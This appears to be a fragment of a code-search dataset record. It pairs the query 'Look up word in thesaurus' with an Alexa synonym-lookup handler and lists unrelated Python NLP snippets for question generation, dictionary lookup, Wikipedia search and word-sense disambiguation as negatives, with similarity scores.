+ \"anything\" + ' ' + \\\n line.words[bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT5'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + \"anything\" + ' ' + \\\n line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN5'\n questions.append(question)\n\n elif all(key in bucket for key in PRS5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + j[0] + ' ' + '?'\n pattern_name = 'PRS5'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT6): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT6'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN6): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'PRSIN6'\n questions.append(question)\n\n elif all(key in bucket for key in PRS6): # 'NNP', 'VBZ', 'NN' in sentence\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS6'\n questions.append(question)\n\n ########################################### End present simple #################################\n\n ##################################################### MD 
###########################################\n elif all(key in bucket for key in MD1): # 'NNP', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD1'\n questions.append(question)\n\n elif all(key in bucket for key in MD2): # 'PRP', 'VB' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD2'\n questions.append(question)\n\n elif all(key in bucket for key in MD3): # 'NNPS', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[\n bucket['NNPS']] + ' ' + line.words[bucket['VB']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD3'\n questions.append(question)\n\n elif all(key in bucket for key in MD4): # 'NNS', 'VB' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VB']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD4'\n questions.append(question)\n\n elif all(key in bucket for key in MD5): # 'NNP', 'VB' in sentence.\n if line.words[bucket['NN']] != j[0]:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + j[0] + '?'\n pattern_name = 'MD5'\n questions.append(question)\n\n elif all(key in bucket for key in MD6): # 'NNP', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[\n bucket['NNS']] + ' ' + line.words[bucket['VB']].singularize() + ' ' + line.words[\n bucket['NN']] + ' ' + '?'\n pattern_name = 'MD6'\n questions.append(question)\n ####################################### End MD ###############################################\n ###################################### JJ ####################################################\n elif all(key in bucket for key in JJ1): # 'NNP', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ1'\n questions.append(question)\n\n elif all(key in bucket for key in JJ2): # 'PRP', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ2'\n questions.append(question)\n\n elif all(key in bucket for key in JJ3): # 'NNPS', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ3'\n questions.append(question)\n\n elif all(key in bucket for key in JJ4): # 'NNPS', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ4'\n questions.append(question)\n\n elif all(key in bucket for key in JJ5): # 'NNS', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ5'\n questions.append(question)\n\n elif all(key in bucket for key in JJ6): # 'NNS', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ6'\n 
questions.append(question)\n ####################################### END JJ ###########################################################\n ########################################### Past simple #################################\n try:\n if all(key in bucket for key in PASDT1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did' + ' ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PASDT1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PASIN1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PASIN1'\n questions.append(question)\n\n elif all(key in bucket for key in PAS1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASDT2'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN2'\n questions.append(question)\n\n elif all(key in bucket for key in PAS2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[\n bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] 
+ '?'\n pattern_name = 'PASDT3'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PASIN3'\n questions.append(question)\n\n elif all(key in bucket for key in PAS3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PAS3'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASDT4'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN4'\n questions.append(question)\n\n elif all(key in bucket for key in PAS4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS4'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n ## PASDT6 before PASDT5 ##\n elif all(key in bucket for key in PASDT6): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PASDT6'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN6): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN6'\n questions.append(question)\n\n elif all(key in bucket for key in PAS6): # 'NNP', 'VBZ' in sentence.\n if 
line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS6'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n\n elif all(key in bucket for key in PASDT5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PASDT5'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN5'\n questions.append(question)\n\n\n elif all(key in bucket for key in PAS5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PAS5'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n\n except:\n a = 'a'\n ############################################### End past simple #####################################\n # When the tags are generated 's is split to ' and s. To overcome this issue.\n if 'VBZ' in bucket and line.words[bucket['VBZ']] == \"’\":\n question = question.replace(\" ’ \", \"'s \")\n questions.append(question)\n\n # Print the genetated questions as output.\n # if question != '':\n # print('\\n', 'Question: ' + question)\n # print('\\n', 'pattern_name: ' + pattern_name)\n keyword_Questions_dic[key] = questions.copy()\n questions.clear()\n\n\n except:\n # print(' ')\n # print(\"No Modal Questions Generated! Please revise your text.\")\n keyword_Questions_dic[key] = \"No Modal Questions Generated! 
Please revise your text.\"\n\n return (keyword_Questions_dic)", "def generate_sentence():\n markov_chain = makeMarkovDict(\"text.txt\")\n\n # Pick a random word to begin with.\n first_word = random.choice(markov_chain.keys()) # Illegall\n\n # print first_word\n # random_choice = random.randint(0, len(markov_chain.keys()))\n # index = 0\n # first_word = \"\"\n # for word in markov_chain:\n # print word\n # if index == random_choice:\n # first_word = word\n # break\n # index += 1\n\n # Based on that word, call function to chose the next word.\n # print markov_chain[first_word]\n # print word_selection(markov_chain[first_word])\n\n lenght_of_sentence = 10\n sentence = [first_word] # First word already in there\n for i in range(lenght_of_sentence):\n sentence.append(word_selection(markov_chain[sentence[i]]))\n # Sentence after loop: ['fish', 'red', 'fish', 'two', 'fish', 'red', 'fish', 'red', 'fish', 'two', 'fish']\n\n # Cap with letter and add period at the end.\n final_sentece = \" \".join(sentence) + \".\"\n return final_sentece.capitalize()", "def speak(self, what):\n if isinstance(what, str):\n return self.whatever()\n\n what = self.clean(what)\n if not what or what == '':\n return self.silence()\n if what.isupper():\n return self.shouting()\n if what.endswith('?'):\n return self.asking()\n return self.whatever()", "def predict_sentences(self, sents):\n tkw=self.tkw\n sents_attr=[]\n sent_samples={\n \"word_inputs\":[],\n \"predicate_inputs\":[],\n \"postags_inputs\":[]\n }\n print('prepare data')\n for sid,sent in enumerate(sents):\n if sid % (int(np.ceil(len(sents)/100))) == 0:\n print(sid / len(sents))\n sent_str = \" \".join(sent)\n preds = [(word.i, str(word))\n for word\n in tkw.parser(sent_str)\n if word.tag_.startswith(\"V\")]\n num_of_samples = int(np.ceil(float(len(sent)) / self.sent_maxlen) * self.sent_maxlen)\n pred_list=[]\n for ind, pred in preds:\n cur_sample=self.encode_inputs([self.create_sample(sent, ind)])\n for name in [\"word_inputs\", \"predicate_inputs\", \"postags_inputs\"]:\n sent_samples[name].append(cur_sample[name])\n pred_list.append((ind, pred))\n sents_attr.append((num_of_samples,pred_list,len(sent)))\n for key in sent_samples:\n sent_samples[key]=np.concatenate(sent_samples[key],axis=0)\n print('predict data')\n X = sent_samples\n Y=self.model.predict(X)\n # print(Y[0])\n # print(Y[2])\n res=[]\n p=0\n for attr in sents_attr:\n num_of_samples,pred_list,sent_len=attr\n sample_len=num_of_samples//self.sent_maxlen\n ret=[]\n for pid,(ind, pred) in enumerate(pred_list):\n ret.append(((ind, pred),\n [(self.consolidate_label(label), float(prob))\n for (label, prob) in\n self.transform_output_probs(Y[p+pid*sample_len:p+(pid+1)*sample_len], \n get_prob = True).reshape(num_of_samples,\n 2)[:sent_len]]))\n res.append(ret)\n p+=len(pred_list)*sample_len\n return res" ]
[ "0.67601943", "0.6399362", "0.6366831", "0.63550425", "0.6288494", "0.62700784", "0.6220967", "0.6183083", "0.6126741", "0.6104425", "0.60613656", "0.60591984", "0.6058863", "0.59571433", "0.5951869", "0.59310657", "0.5929599", "0.5913799", "0.5897607", "0.589439", "0.58943844", "0.5884642", "0.5851857", "0.58299387", "0.5825041", "0.58182675", "0.58036625", "0.57902575", "0.578956", "0.5780092", "0.5771403", "0.57526654", "0.57390195", "0.57295763", "0.5728217", "0.5725698", "0.57237893", "0.57094765", "0.5693179", "0.5684071", "0.5673015", "0.56726843", "0.56724805", "0.56607", "0.563757", "0.5607794", "0.5592702", "0.55901426", "0.5574678", "0.5572765", "0.5564563", "0.5547697", "0.553798", "0.5533821", "0.55324495", "0.5519464", "0.55131036", "0.55102533", "0.5509883", "0.55077225", "0.5502964", "0.54963785", "0.54855907", "0.5484039", "0.54801685", "0.547996", "0.547581", "0.5470834", "0.5470009", "0.5469212", "0.54614276", "0.5452656", "0.5452409", "0.54512376", "0.54496765", "0.5446275", "0.54451936", "0.54416627", "0.54387164", "0.54315436", "0.5430249", "0.5427507", "0.5426966", "0.5426966", "0.5415549", "0.54114366", "0.5409098", "0.54078203", "0.5401266", "0.54002124", "0.5399653", "0.53985447", "0.53969854", "0.5396285", "0.53939956", "0.5393861", "0.53921163", "0.53832746", "0.53776896", "0.53776515" ]
0.653233
1
Look up word in thesaurus
def my_word_example_handler(handler_input):
    # type: (HandlerInput) -> Response
    slots = handler_input.request_envelope.request.intent.slots

    if synonym_slot in slots:
        curr_word = slots[synonym_slot].value
        handler_input.attributes_manager.session_attributes[
            synonym_slot_key] = curr_word
        try:
            synonyms = http_get(curr_word, True)
            if type(synonyms[0]) == dict:
                speech = ("A synonym for {} is {}".format(
                    curr_word, synonyms[0]['meta']['syns'][0][0]))
                synonym_list = synonyms[0]['meta']['syns'][0]
                reprompt = ("What word would you like a synonym for?")
            else:
                speech = ("No synonyms for {} are available. "
                          "Can I look up another word?").format(curr_word)
                reprompt = ("What word would you like a synonym for?")
        except:
            speech = ("No synonyms for {} are available. "
                      "Can I look up another word?").format(curr_word)
            reprompt = ("What word would you like a synonym for?")
    else:
        speech = "I'm not sure what word to find a synonym for, please try again"
        reprompt = ("I didn't catch that. What word would you like me "
                    "me to look up a synonym for?")

    handler_input.attributes_manager.session_attributes[previous_key] = speech

    handler_input.response_builder.speak(speech).ask(reprompt)
    return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lookup(self, word):\n word = word.lower()\n if self.stemmer:\n word = self.stemmer.stem(word)\n \n return [self.documents.get(id, None) for id in self.index.get(word)]", "def thesaurus(self, message):\n read_pointer = open('Thesaurus.txt')\n\n for line in read_pointer:\n split_line = line.split(':', 1)\n if split_line[0] == message:\n return split_line[1]", "def search(self, word):", "def query_word(self, word):\n raise NotImplementedError", "def lookup(text):\n ret = basic(text)\n ret.update(basic(text, \"gwas\"))\n return ret", "def lookup_word(word):\n\n return API.get_response(word)", "def query_word(self, word):\n return [r[0] for r in sparqlquery(self.endpoint, self.query % {'word': word})]", "def find_abecedarian_words():\n pass", "def search(self, term):", "def search(self, lookupword):\n with sqlite3.connect(self.dbpath) as conn:\n cursor = conn.cursor()\n cursor.execute('SELECT word, videofile FROM translation WHERE \\\n lower(word)=lower(?)', (lookupword,))\n find = cursor.fetchall()\n\n if find != []:\n # the word was found\n find = self.addSuffixes(find)\n return (True, find)\n\n else:\n # the word was not found\n # search the database for similar words\n altoptions = self._findAltOpts(lookupword)\n return (False, altoptions)", "def test_issue7306(en_lookup_nlp):\n doc = Doc(en_lookup_nlp.vocab, words=[\"singing\"])\n lemmatizer = en_lookup_nlp.get_pipe(\"lemmatizer\")\n doc = lemmatizer(doc)\n assert doc[0].lemma_ == \"sing\"", "def scrapeSynonym(word,key='b08CVJHscZ6rRGfc7MzS',language='en_US', max=5):\n endpoint = \"http://thesaurus.altervista.org/thesaurus/v1\"\n url = endpoint + \"?word={}&language={}&key={}&output=json\".format(word,language,key)\n r = requests.request('GET', url, timeout=5.0)\n if r.status_code == 200:\n try:\n syns = r.json()['response'][0]['list']['synonyms'].split('|')\n except KeyError or TypeError:\n return None\n\n del syns[max:]\n for i in range(len(syns)):\n syns[i] = syns[i].split(' ')[0] \n\n return {'word' : word,'syns' : syns}", "def _lookup(self, search, auto_suggest=True):\n try:\n # Use the version of Wikipedia appropriate to the request language\n dict = self.translate_namedvalues(\"wikipedia_lang\")\n wiki.set_lang(dict[\"code\"])\n\n # First step is to get wiki article titles. This comes back\n # as a list. I.e. \"beans\" returns ['beans',\n # 'Beans, Beans the Music Fruit', 'Phaseolus vulgaris',\n # 'Baked beans', 'Navy beans']\n results = wiki.search(search, 5)\n if len(results) == 0:\n self.speak_dialog(\"no entry found\")\n return\n\n # Now request the summary for the first (best) match. Wikipedia\n # writes in inverted-pyramid style, so the first sentence is the\n # most important, the second less important, etc. Two sentences\n # is all we ever need.\n lines = 2\n summary = wiki.summary(results[0], lines,\n auto_suggest=auto_suggest)\n\n if \"==\" in summary or len(summary) > 250:\n # We hit the end of the article summary or hit a really long\n # one. Reduce to first line.\n lines = 1\n summary = wiki.summary(results[0], lines,\n auto_suggest=auto_suggest)\n\n # Now clean up the text and for speaking. Remove words between\n # parenthesis and brackets. 
Wikipedia often includes birthdates\n # in the article title, which breaks up the text badly.\n summary = re.sub(r'\\([^)]*\\)|/[^/]*/', '', summary)\n\n # Send to generate displays\n self.gui.clear()\n pagetext = wiki.page(results[0], auto_suggest=auto_suggest)\n self.gui['summary'] = summary\n self.gui['imgLink'] = wiki_image(pagetext)\n self.gui.show_page(\"WikipediaDelegate.qml\", override_idle=60)\n\n # Remember context and speak results\n self.set_context(\"wiki_article\", results[0])\n self.set_context(\"spoken_lines\", str(lines))\n self.speak(summary)\n self.results = results\n\n except wiki.exceptions.DisambiguationError as e:\n # Test: \"tell me about john\"\n options = e.options[:5]\n\n option_list = (\", \".join(options[:-1]) + \" \" +\n self.translate(\"or\") + \" \" + options[-1])\n choice = self.get_response('disambiguate',\n data={\"options\": option_list})\n if choice:\n self._lookup(choice, auto_suggest=auto_suggest)", "def filter(self, word):\n \n word = word.lower()\n try:\n self.engine.fetch(word)\n except socket.error:\n raise LemmaAPIError\n part_of_speeches = self.engine.part_of_speeches\n\n \n self.basic_form = word\n for part in part_of_speeches:\n if part == 'verb':\n if self.engine.is_verb_conjugated():\n if not self.conEngine.is_verb_regular(word, self.engine.get_basic_verb()):\n self.basic_form = self.engine.get_basic_verb()\n return word\n else:\n self.basic_form = self.engine.get_basic_verb()\n\n elif part == 'noun':\n if self.engine.is_noun_plural():\n if not self.conEngine.is_noun_regular(word, self.engine.get_singular_noun()):\n self.basic_form = self.engine.get_singular_noun() \n return word\n else:\n self.basic_form = self.engine.get_singular_noun()\n\n return self.basic_form", "def lookup(index,keyword):\n\tif keyword in index:\n\t\treturn index[keyword]\n\treturn None", "def get_word( self, result ):\n text = result.text if is_result( result ) else result\n # print(\"get_word: %s\" % text)\n # Get if already exists\n word = self.session.query( Word ).filter( Word.word == text ).first()\n\n # Create a new word if doesn't yet exist\n if not isinstance( word, Word ):\n word = Word()\n word.word = text\n\n return word", "def test_find_word(self):\n mic = mi.MicrophoneToText()\n\n teststring = 'x transcript\": ort lautet testort }x'\n\n word = mic.find_word(teststring)\n\n self.assertEqual(word, ' ort lautet testort ')", "def get_translation(self, word):\n qr = Query()\n val = self.db.search(qr.word == word)\n if val:\n return val[0][\"translations\"]\n else:\n return []", "def meaning_of(word, app_id, app_key):\n \n url = 'https://od-api.oxforddictionaries.com:443/api/v1/entries/' + language + '/' + word.lower()\n r = requests.get(url, headers={\"app_id\":app_id, \"app_key\":app_key})\n\n data = r.json()\n useful_data = {}\n\n for i in data['results'][0]['lexicalEntries'][0]['entries']:\n for j in i:\n for k in i[j][0]:\n try:\n subdata = i[j][0][k]\n if k == 'subsenses':\n useful_data.update({\"meanings\":subdata[0]['definitions']})\n elif k == 'examples':\n useful_data.update({\"examples\":subdata[0]['text']})\n else:\n pass\n except:\n pass\n return useful_data", "def lesk(self, tweet, word, created_at, tweet_id):\n ikb_obj = self.database.get(self.collection_of_slangs, field='word', value=word)[0]\n ikb_id = ikb_obj[\"_id\"]\n\n dicts = ikb_obj['payload']\n elements = [value for dictt, item in dicts.items() for value in item]\n definitions, usages = self.extract_def_use(elements)\n if len(definitions) == 0:\n raise ValueError(\"Empty lists of 
definitions and usages\")\n usages_vec = self.model.vectorize_sentences(usages)\n tweet_vec = self.model.vectorize_sentences([tweet])\n cs = np.array(cosine_similarity(usages_vec, tweet_vec))\n ind_max = np.argmax(cs)\n\n best_definition = definitions[ind_max]\n dictionary_of_best_definition = EnrichmentLayer.find_name_of_dict_by_definition(dicts, best_definition)\n try:\n filter_for_search = {\"dictionary_title\": dictionary_of_best_definition, \"definition\": best_definition}\n document = self.database.get(self.collection_used_slang, filter=filter_for_search)[0]\n tweets = document['tweets']\n tweets.append(tweet_id)\n self.database.update(self.collection_used_slang, \"ikb_id\", ikb_id, {\"tweets\": tweets}, upsert=False)\n id_of_insert = document['_id']\n except IndexError:\n document = {'ikb_id': ikb_id, 'word': word, 'dictionary_title': dictionary_of_best_definition,\n 'definition': best_definition, 'created_at': created_at, 'tweets': [tweet_id]}\n id_of_insert = self.database.insert(self.collection_used_slang, document)\n\n return self.replace_word(tweet.split(), word, best_definition), best_definition, id_of_insert", "def definition(request, word_to_lookup):\n return render(request, 'definition.html')", "def phrase_retrieve(self, query):\n # ------------------------------------------------------------------\n # TODO: Implement Phrase Query retrieval (ie. return the documents \n # that don't just contain the words, but contain them in the \n # correct order) You will want to use the inverted index \n # that you created in index(), and may also consider using\n # boolean_retrieve. \n # NOTE that you no longer have access to the original documents\n # in self.docs because it is now a map from doc IDs to set\n # of unique words in the original document.\n # Right now this just returns all possible documents!\n docs = []\n first_hash = self.boolean_retrieve(query) # narrows down possible documents\n\n for doc in first_hash:\n title = self.titles[doc]\n word_list = []\n \n for word in query:\n word_list.append(self.inv_index[word][title]) # list for each query word from inverted index\n\n if len(word_list) == 1:\n docs.append(doc) # only one word in query\n break\n\n is_match = bool # undefined boolean value for match or not\n\n for i in word_list[0]: # first word occurrence positions\n for j in range(1, len(query)): # next words in query\n if (i + j) in word_list[j]: # check if words in positional order for document\n is_match = True # stays true throughout range(1, len(query)) if match\n else:\n is_match = False # update match status \n break\n if is_match:\n docs.append(doc)\n break\n \n # ------------------------------------------------------------------\n return sorted(docs) # sorted doesn't actually matter", "def test_word_found_in_file(self):\n\n # create indexer object\n indexer = indexing_module.IndexModule()\n\n # index the location (storage/data/test/empty_directory)\n indexer.index(_path_prefix + 'word_not_found')\n\n # search for few words and check that the result is empty\n result = indexer.search(\"unit\")\n self.assertTrue(result != [])\n\n result = indexer.search(\"index\")\n self.assertTrue(result != [])\n print(result)", "def search(self, query, k=None):\n # all_dicts = self._indexer.load_index('inverted_idx.pkl')\n inverted_index = self._indexer.inverted_idx\n posting = self._indexer.postingDict\n documents = self._indexer.documents\n dict_of_methods = self._indexer.dict_of_method\n\n if dict_of_methods['wordnet']== True:\n #wordnet method\n doc_query_app = 
self.finished_dict(query, inverted_index) # first parse query words\n list_of_query = doc_query_app.keys()\n words_to_add = {}\n # get each query word its synsets and add to query the ones that in inverted index\n for word in list_of_query:\n opt = wordnet.synsets(word)\n for i in range(len(opt)):\n check_word = opt[i].lemmas()[0].name()\n if check_word in doc_query_app.keys() or check_word in words_to_add.keys():\n continue\n tested = self._indexer.check_upper_lower(inverted_index, check_word)\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.0001\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.0001\n doc_query_app.update(words_to_add)\n\n elif dict_of_methods['spell_correction']== True:\n spell = SpellChecker(case_sensitive=True)\n query_as_list = query.split()\n for index in range(len(query_as_list)):\n is_upper = False\n word = query_as_list[index]\n # if word from query not in inverted index look 